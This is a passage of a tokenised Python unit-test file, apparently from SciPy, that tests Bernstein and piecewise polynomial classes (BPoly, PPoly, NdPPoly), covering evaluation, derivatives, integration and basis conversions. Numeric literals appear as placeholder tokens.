<EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> c = [ [ <NUM_LIT:3> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT:0.1> ) , <NUM_LIT> ) <EOL> def test_simple2 ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> c = [ [ <NUM_LIT:3> ] , [ <NUM_LIT:1> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT:0.1> ) , <NUM_LIT:3> * <NUM_LIT> + <NUM_LIT:1.> * <NUM_LIT:0.1> ) <EOL> def test_simple3 ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> c = [ [ <NUM_LIT:3> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:4> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT> ) , <EOL> <NUM_LIT:3> * <NUM_LIT> * <NUM_LIT> + <NUM_LIT:1> * <NUM_LIT:2> * <NUM_LIT> * <NUM_LIT> + <NUM_LIT:4> * <NUM_LIT> * <NUM_LIT> ) <EOL> def test_simple4 ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> c = [ [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT> ) , <NUM_LIT> ** <NUM_LIT:3> + <EOL> <NUM_LIT:3> * <NUM_LIT> ** <NUM_LIT:2> * <NUM_LIT> + <EOL> <NUM_LIT:3> * <NUM_LIT> * <NUM_LIT> ** <NUM_LIT:2> + <EOL> <NUM_LIT:2> * <NUM_LIT> ** <NUM_LIT:3> ) <EOL> def test_simple5 ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> c = [ [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:8> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:1> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT> ) , <NUM_LIT> ** <NUM_LIT:4> + <EOL> <NUM_LIT:4> * <NUM_LIT> ** <NUM_LIT:3> * <NUM_LIT> + <EOL> <NUM_LIT:8> * <NUM_LIT:6> * <NUM_LIT> ** <NUM_LIT:2> * <NUM_LIT> ** <NUM_LIT:2> + <EOL> <NUM_LIT:2> * <NUM_LIT:4> * <NUM_LIT> * <NUM_LIT> ** <NUM_LIT:3> + <EOL> <NUM_LIT> ** <NUM_LIT:4> ) <EOL> def test_multi_shape ( self ) : <EOL> c = np . random . rand ( <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> p = BPoly ( c , x ) <EOL> assert_equal ( p . x . shape , x . shape ) <EOL> assert_equal ( p . c . shape , c . shape ) <EOL> assert_equal ( p ( <NUM_LIT> ) . shape , c . shape [ <NUM_LIT:2> : ] ) <EOL> assert_equal ( p ( np . random . rand ( <NUM_LIT:5> , <NUM_LIT:6> ) ) . shape , <EOL> ( <NUM_LIT:5> , <NUM_LIT:6> ) + c . shape [ <NUM_LIT:2> : ] ) <EOL> dp = p . derivative ( ) <EOL> assert_equal ( dp . c . shape , ( <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> def test_interval_length ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:2> ] <EOL> c = [ [ <NUM_LIT:3> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:4> ] ] <EOL> bp = BPoly ( c , x ) <EOL> xval = <NUM_LIT:0.1> <EOL> s = xval / <NUM_LIT:2> <EOL> assert_allclose ( bp ( xval ) , <NUM_LIT:3> * ( <NUM_LIT:1> - s ) * ( <NUM_LIT:1> - s ) + <NUM_LIT:1> * <NUM_LIT:2> * s * ( <NUM_LIT:1> - s ) + <NUM_LIT:4> * s * s ) <EOL> def test_two_intervals ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> c = [ [ <NUM_LIT:3> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:2> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT> ) , <NUM_LIT:3> * <NUM_LIT> * <NUM_LIT> ) <EOL> assert_allclose ( bp ( <NUM_LIT> ) , <NUM_LIT:2> * ( <NUM_LIT> / <NUM_LIT:2> ) ** <NUM_LIT:2> ) <EOL> def test_extrapolate_attr ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:2> ] <EOL> c = [ [ <NUM_LIT:3> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:4> ] ] <EOL> bp = BPoly ( c , x ) <EOL> for extrapolate in ( True , False , None ) : <EOL> bp = BPoly ( c , x , extrapolate = extrapolate ) <EOL> bp_d = bp . derivative ( ) <EOL> if extrapolate is False : <EOL> assert_ ( np . isnan ( bp ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . all ( ) ) <EOL> assert_ ( np . isnan ( bp_d ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . all ( ) ) <EOL> else : <EOL> assert_ ( not np . isnan ( bp ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . any ( ) ) <EOL> assert_ ( not np . isnan ( bp_d ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . any ( ) ) <EOL> class TestBPolyCalculus ( TestCase ) : <EOL> def test_derivative ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> c = [ [ <NUM_LIT:3> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:2> ] ] <EOL> bp = BPoly ( c , x ) <EOL> bp_der = bp . derivative ( ) <EOL> assert_allclose ( bp_der ( <NUM_LIT> ) , - <NUM_LIT:6> * ( <NUM_LIT> ) ) <EOL> assert_allclose ( bp_der ( <NUM_LIT> ) , <NUM_LIT> ) <EOL> assert_allclose ( [ bp ( <NUM_LIT> , nu = <NUM_LIT:1> ) , bp ( <NUM_LIT> , nu = <NUM_LIT:2> ) , bp ( <NUM_LIT> , nu = <NUM_LIT:3> ) ] , <EOL> [ - <NUM_LIT:6> * ( <NUM_LIT:1> - <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT:0.> ] ) <EOL> assert_allclose ( [ bp ( <NUM_LIT> , nu = <NUM_LIT:1> ) , bp ( <NUM_LIT> , nu = <NUM_LIT:2> ) , bp ( <NUM_LIT> , nu = <NUM_LIT:3> ) ] , <EOL> [ <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0> ] ) <EOL> def test_derivative_ppoly ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:8> <EOL> x = np . sort ( np . random . random ( m ) ) <EOL> c = np . random . random ( ( k , m - <NUM_LIT:1> ) ) <EOL> bp = BPoly ( c , x ) <EOL> pp = PPoly . from_bernstein_basis ( bp ) <EOL> for d in range ( k ) : <EOL> bp = bp . derivative ( ) <EOL> pp = pp . derivative ( ) <EOL> xp = np . linspace ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> assert_allclose ( bp ( xp ) , pp ( xp ) ) <EOL> def test_deriv_inplace ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:8> <EOL> x = np . sort ( np . random . random ( m ) ) <EOL> c = np . random . random ( ( k , m - <NUM_LIT:1> ) ) <EOL> for cc in [ c . copy ( ) , c * ( <NUM_LIT:1.> + <NUM_LIT> ) ] : <EOL> bp = BPoly ( cc , x ) <EOL> xp = np . linspace ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> for i in range ( k ) : <EOL> assert_allclose ( bp ( xp , i ) , bp . derivative ( i ) ( xp ) ) <EOL> def test_antiderivative_simple ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> c = [ [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] ] <EOL> bp = BPoly ( c , x ) <EOL> bi = bp . antiderivative ( ) <EOL> xx = np . linspace ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:11> ) <EOL> assert_allclose ( bi ( xx ) , <EOL> np . where ( xx < <NUM_LIT:1> , xx ** <NUM_LIT:2> / <NUM_LIT> , <EOL> <NUM_LIT:0.5> * xx * ( xx / <NUM_LIT> - <NUM_LIT:1> ) + <NUM_LIT> / <NUM_LIT:4> ) , <EOL> atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_der_antider ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT:11> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> bp = BPoly ( c , x ) <EOL> xx = np . linspace ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , <NUM_LIT:100> ) <EOL> assert_allclose ( bp . antiderivative ( ) . derivative ( ) ( xx ) , <EOL> bp ( xx ) , atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_antider_ppoly ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT:11> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> bp = BPoly ( c , x ) <EOL> pp = PPoly . from_bernstein_basis ( bp ) <EOL> xx = np . linspace ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , <NUM_LIT:10> ) <EOL> assert_allclose ( bp . antiderivative ( <NUM_LIT:2> ) ( xx ) , <EOL> pp . antiderivative ( <NUM_LIT:2> ) ( xx ) , atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_antider_continuous ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT:11> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:4> , <NUM_LIT:10> ) ) <EOL> bp = BPoly ( c , x ) . antiderivative ( ) <EOL> xx = bp . x [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> assert_allclose ( bp ( xx - <NUM_LIT> ) , <EOL> bp ( xx + <NUM_LIT> ) , atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_integrate ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT:11> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:4> , <NUM_LIT:10> ) ) <EOL> bp = BPoly ( c , x ) <EOL> pp = PPoly . from_bernstein_basis ( bp ) <EOL> assert_allclose ( bp . integrate ( <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> pp . integrate ( <NUM_LIT:0> , <NUM_LIT:1> ) , atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_integrate_extrap ( self ) : <EOL> c = [ [ <NUM_LIT:1> ] ] <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> b = BPoly ( c , x ) <EOL> assert_allclose ( b . integrate ( <NUM_LIT:0> , <NUM_LIT:2> ) , <NUM_LIT> , atol = <NUM_LIT> ) <EOL> b1 = BPoly ( c , x , extrapolate = False ) <EOL> assert_ ( np . isnan ( b1 . integrate ( <NUM_LIT:0> , <NUM_LIT:2> ) ) ) <EOL> assert_allclose ( b1 . integrate ( <NUM_LIT:0> , <NUM_LIT:2> , extrapolate = True ) , <NUM_LIT> , atol = <NUM_LIT> ) <EOL> def test_antider_neg ( self ) : <EOL> c = [ [ <NUM_LIT:1> ] ] <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> b = BPoly ( c , x ) <EOL> xx = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> ) <EOL> assert_allclose ( b . derivative ( - <NUM_LIT:1> ) ( xx ) , b . antiderivative ( ) ( xx ) , <EOL> atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> assert_allclose ( b . derivative ( <NUM_LIT:1> ) ( xx ) , b . antiderivative ( - <NUM_LIT:1> ) ( xx ) , <EOL> atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> class TestPolyConversions ( TestCase ) : <EOL> def test_bp_from_pp ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> c = [ [ <NUM_LIT:3> , <NUM_LIT:2> ] , [ <NUM_LIT:1> , <NUM_LIT:8> ] , [ <NUM_LIT:4> , <NUM_LIT:3> ] ] <EOL> pp = PPoly ( c , x ) <EOL> bp = BPoly . from_power_basis ( pp ) <EOL> pp1 = PPoly . from_bernstein_basis ( bp ) <EOL> xp = [ <NUM_LIT:0.1> , <NUM_LIT> ] <EOL> assert_allclose ( pp ( xp ) , bp ( xp ) ) <EOL> assert_allclose ( pp ( xp ) , pp1 ( xp ) ) <EOL> def test_bp_from_pp_random ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:8> <EOL> x = np . sort ( np . random . random ( m ) ) <EOL> c = np . random . random ( ( k , m - <NUM_LIT:1> ) ) <EOL> pp = PPoly ( c , x ) <EOL> bp = BPoly . from_power_basis ( pp ) <EOL> pp1 = PPoly . from_bernstein_basis ( bp ) <EOL> xp = np . linspace ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> assert_allclose ( pp ( xp ) , bp ( xp ) ) <EOL> assert_allclose ( pp ( xp ) , pp1 ( xp ) ) <EOL> def test_pp_from_bp ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> c = [ [ <NUM_LIT:3> , <NUM_LIT:3> ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:4> , <NUM_LIT:2> ] ] <EOL> bp = BPoly ( c , x ) <EOL> pp = PPoly . from_bernstein_basis ( bp ) <EOL> bp1 = BPoly . from_power_basis ( pp ) <EOL> xp = [ <NUM_LIT:0.1> , <NUM_LIT> ] <EOL> assert_allclose ( bp ( xp ) , pp ( xp ) ) <EOL> assert_allclose ( bp ( xp ) , bp1 ( xp ) ) <EOL> class TestBPolyFromDerivatives ( TestCase ) : <EOL> def test_make_poly_1 ( self ) : <EOL> c1 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ) <EOL> assert_allclose ( c1 , [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> def test_make_poly_2 ( self ) : <EOL> c1 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> ] ) <EOL> assert_allclose ( c1 , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ) <EOL> c2 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:1> ] ) <EOL> assert_allclose ( c2 , [ <NUM_LIT> , <NUM_LIT> / <NUM_LIT:2> , <NUM_LIT:1.> ] ) <EOL> c3 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:2> ] , [ <NUM_LIT:1> , <NUM_LIT:3> ] ) <EOL> assert_allclose ( c3 , [ <NUM_LIT> , - <NUM_LIT:0.5> , <NUM_LIT:1.> ] ) <EOL> def test_make_poly_3 ( self ) : <EOL> c1 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:4> ] ) <EOL> assert_allclose ( c1 , [ <NUM_LIT:1.> , <NUM_LIT> / <NUM_LIT:3> , <NUM_LIT> / <NUM_LIT:6> , <NUM_LIT> ] ) <EOL> c2 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> ] , [ <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> assert_allclose ( c2 , [ <NUM_LIT:1.> , <NUM_LIT> / <NUM_LIT:6> , <NUM_LIT> / <NUM_LIT:3> , <NUM_LIT> ] ) <EOL> c3 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:4> , <NUM_LIT:3> ] ) <EOL> assert_allclose ( c3 , [ <NUM_LIT:1.> , <NUM_LIT> / <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> def test_make_poly_12 ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> ya = np . r_ [ <NUM_LIT:0> , np . random . random ( <NUM_LIT:5> ) ] <EOL> yb = np . r_ [ <NUM_LIT:0> , np . random . random ( <NUM_LIT:5> ) ] <EOL> c = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , ya , yb ) <EOL> pp = BPoly ( c [ : , None ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> for j in range ( <NUM_LIT:6> ) : <EOL> assert_allclose ( [ pp ( <NUM_LIT:0.> ) , pp ( <NUM_LIT:1.> ) ] , [ ya [ j ] , yb [ j ] ] ) <EOL> pp = pp . derivative ( ) <EOL> def test_raise_degree ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> k , d = <NUM_LIT:8> , <NUM_LIT:5> <EOL> c = np . random . random ( ( k , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> bp = BPoly ( c , x ) <EOL> c1 = BPoly . _raise_degree ( c , d ) <EOL> bp1 = BPoly ( c1 , x ) <EOL> xp = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:11> ) <EOL> assert_allclose ( bp ( xp ) , bp1 ( xp ) ) <EOL> def test_xi_yi ( self ) : <EOL> assert_raises ( ValueError , BPoly . from_derivatives , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:0> ] ) <EOL> def test_coords_order ( self ) : <EOL> xi = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> yi = [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] <EOL> assert_raises ( ValueError , BPoly . from_derivatives , xi , yi ) <EOL> def test_zeros ( self ) : <EOL> xi = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> yi = [ [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> pp = BPoly . from_derivatives ( xi , yi ) <EOL> assert_ ( pp . c . shape == ( <NUM_LIT:4> , <NUM_LIT:3> ) ) <EOL> ppd = pp . derivative ( ) <EOL> for xp in [ <NUM_LIT:0.> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> assert_allclose ( [ pp ( xp ) , ppd ( xp ) ] , [ <NUM_LIT:0.> , <NUM_LIT:0.> ] ) <EOL> def _make_random_mk ( self , m , k ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> xi = np . asarray ( [ <NUM_LIT:1.> * j ** <NUM_LIT:2> for j in range ( m + <NUM_LIT:1> ) ] ) <EOL> yi = [ np . random . random ( k ) for j in range ( m + <NUM_LIT:1> ) ] <EOL> return xi , yi <EOL> def test_random_12 ( self ) : <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:12> <EOL> xi , yi = self . _make_random_mk ( m , k ) <EOL> pp = BPoly . from_derivatives ( xi , yi ) <EOL> for order in range ( k // <NUM_LIT:2> ) : <EOL> assert_allclose ( pp ( xi ) , [ yy [ order ] for yy in yi ] ) <EOL> pp = pp . derivative ( ) <EOL> def test_order_zero ( self ) : <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:12> <EOL> xi , yi = self . _make_random_mk ( m , k ) <EOL> assert_raises ( ValueError , BPoly . from_derivatives , <EOL> ** dict ( xi = xi , yi = yi , orders = <NUM_LIT:0> ) ) <EOL> def test_orders_too_high ( self ) : <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:12> <EOL> xi , yi = self . _make_random_mk ( m , k ) <EOL> pp = BPoly . from_derivatives ( xi , yi , orders = <NUM_LIT:2> * k - <NUM_LIT:1> ) <EOL> assert_raises ( ValueError , BPoly . from_derivatives , <EOL> ** dict ( xi = xi , yi = yi , orders = <NUM_LIT:2> * k ) ) <EOL> def test_orders_global ( self ) : <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:12> <EOL> xi , yi = self . _make_random_mk ( m , k ) <EOL> order = <NUM_LIT:5> <EOL> pp = BPoly . from_derivatives ( xi , yi , orders = order ) <EOL> for j in range ( order // <NUM_LIT:2> + <NUM_LIT:1> ) : <EOL> assert_allclose ( pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] - <NUM_LIT> ) , pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] + <NUM_LIT> ) ) <EOL> pp = pp . derivative ( ) <EOL> assert_ ( not np . allclose ( pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] - <NUM_LIT> ) , pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] + <NUM_LIT> ) ) ) <EOL> order = <NUM_LIT:6> <EOL> pp = BPoly . from_derivatives ( xi , yi , orders = order ) <EOL> for j in range ( order // <NUM_LIT:2> ) : <EOL> assert_allclose ( pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] - <NUM_LIT> ) , pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] + <NUM_LIT> ) ) <EOL> pp = pp . derivative ( ) <EOL> assert_ ( not np . allclose ( pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] - <NUM_LIT> ) , pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] + <NUM_LIT> ) ) ) <EOL> def test_orders_local ( self ) : <EOL> m , k = <NUM_LIT:7> , <NUM_LIT:12> <EOL> xi , yi = self . _make_random_mk ( m , k ) <EOL> orders = [ o + <NUM_LIT:1> for o in range ( m ) ] <EOL> for i , x in enumerate ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) : <EOL> pp = BPoly . from_derivatives ( xi , yi , orders = orders ) <EOL> for j in range ( orders [ i ] // <NUM_LIT:2> + <NUM_LIT:1> ) : <EOL> assert_allclose ( pp ( x - <NUM_LIT> ) , pp ( x + <NUM_LIT> ) ) <EOL> pp = pp . derivative ( ) <EOL> assert_ ( not np . allclose ( pp ( x - <NUM_LIT> ) , pp ( x + <NUM_LIT> ) ) ) <EOL> def test_yi_trailing_dims ( self ) : <EOL> m , k = <NUM_LIT:7> , <NUM_LIT:5> <EOL> xi = np . sort ( np . random . random ( m + <NUM_LIT:1> ) ) <EOL> yi = np . random . random ( ( m + <NUM_LIT:1> , k , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ) ) <EOL> pp = BPoly . from_derivatives ( xi , yi ) <EOL> assert_equal ( pp . c . shape , ( <NUM_LIT:2> * k , m , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ) ) <EOL> def test_gh_5430 ( self ) : <EOL> orders = np . int32 ( <NUM_LIT:1> ) <EOL> p = BPoly . from_derivatives ( [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] , orders = orders ) <EOL> assert_almost_equal ( p ( <NUM_LIT:0> ) , <NUM_LIT:0> ) <EOL> orders = np . int64 ( <NUM_LIT:1> ) <EOL> p = BPoly . from_derivatives ( [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] , orders = orders ) <EOL> assert_almost_equal ( p ( <NUM_LIT:0> ) , <NUM_LIT:0> ) <EOL> orders = <NUM_LIT:1> <EOL> p = BPoly . from_derivatives ( [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] , orders = orders ) <EOL> assert_almost_equal ( p ( <NUM_LIT:0> ) , <NUM_LIT:0> ) <EOL> orders = <NUM_LIT:1> <EOL> class TestPpform ( TestCase ) : <EOL> def test_shape ( self ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" , DeprecationWarning ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:12> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) <EOL> x = np . sort ( np . random . rand ( <NUM_LIT> ) ) <EOL> p = ppform ( c , x ) <EOL> xp = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> assert_equal ( p ( xp ) . shape , ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) ) <EOL> class TestNdPPoly ( object ) : <EOL> def test_simple_1d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> + <NUM_LIT:1> ) <EOL> xi = np . random . rand ( <NUM_LIT:200> ) <EOL> p = NdPPoly ( c , ( x , ) ) <EOL> v1 = p ( ( xi , ) ) <EOL> v2 = _ppoly_eval_1 ( c [ : , : , None ] , x , xi ) . ravel ( ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_simple_2d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:6> + <NUM_LIT:1> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> xi = np . random . rand ( <NUM_LIT:200> ) <EOL> yi = np . random . rand ( <NUM_LIT:200> ) <EOL> v1 = np . empty ( [ len ( xi ) , <NUM_LIT:1> ] , dtype = c . dtype ) <EOL> v1 . fill ( np . nan ) <EOL> _ppoly . evaluate_nd ( c . reshape ( <NUM_LIT:4> * <NUM_LIT:5> , <NUM_LIT:6> * <NUM_LIT:7> , <NUM_LIT:1> ) , <EOL> ( x , y ) , <EOL> np . array ( [ <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = np . intc ) , <EOL> np . c_ [ xi , yi ] , <EOL> np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> ] , dtype = np . intc ) , <EOL> <NUM_LIT:1> , <EOL> v1 ) <EOL> v1 = v1 . ravel ( ) <EOL> v2 = _ppoly2d_eval ( c , ( x , y ) , xi , yi ) <EOL> assert_allclose ( v1 , v2 ) <EOL> p = NdPPoly ( c , ( x , y ) ) <EOL> for nu in ( None , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:9> , <NUM_LIT:2> ) ) : <EOL> v1 = p ( np . c_ [ xi , yi ] , nu = nu ) <EOL> v2 = _ppoly2d_eval ( c , ( x , y ) , xi , yi , nu = nu ) <EOL> assert_allclose ( v1 , v2 , err_msg = repr ( nu ) ) <EOL> def test_simple_3d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> + <NUM_LIT:1> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:8> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> z = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> + <NUM_LIT:1> ) ** <NUM_LIT:3> <EOL> xi = np . random . rand ( <NUM_LIT> ) <EOL> yi = np . random . rand ( <NUM_LIT> ) <EOL> zi = np . random . rand ( <NUM_LIT> ) <EOL> p = NdPPoly ( c , ( x , y , z 